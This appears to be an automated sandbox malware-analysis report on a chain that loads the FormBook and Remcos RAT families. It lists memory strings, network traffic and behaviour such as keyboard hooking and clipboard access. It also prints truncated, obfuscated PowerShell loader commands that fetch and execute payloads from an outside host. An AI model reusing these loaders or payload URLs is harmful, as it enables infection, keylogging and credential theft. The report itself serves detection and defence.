Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E5A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://avocaldoperu.com
Source: wscript.exe, 0000000F.00000002.2253941242.000000000078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2252846292.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 0000000F.00000002.2253941242.000000000078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2252846292.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enH
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp(
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpX
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpg
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpn.net/json.gp
Source: powershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe	String found in binary or memory: http://www.ebuddy.com
Source: wab.exe	String found in binary or memory: http://www.imvu.com
Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 00000011.00000002.2266923406.0000000002FB4000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: wab.exe	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBdq
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperu.com
Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperu.com/
Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4243548599.0000000023800000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperu.com/Jouse1.png
Source: wab.exe, 0000000A.00000002.4243548599.0000000023800000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperu.com/Jouse1.pngamalsAffavocaldoperuone.com/Jouse1.png
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperu.com/Jouse4.png
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperuone.com/Jouse4.png
Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&f
Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe	String found in binary or memory: https://www.google.com
Source: wab.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49737 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

Contains functionality for read data from the clipboard

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

17_2_0041183A

Contains functionality to modify clipboard data

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	17_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	17_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	18_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	18_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	19_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	19_2_004072B5

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7860.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_8084.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 4336
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4360
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 4400
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4400
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 4336	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4360	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 4400	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4400

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU 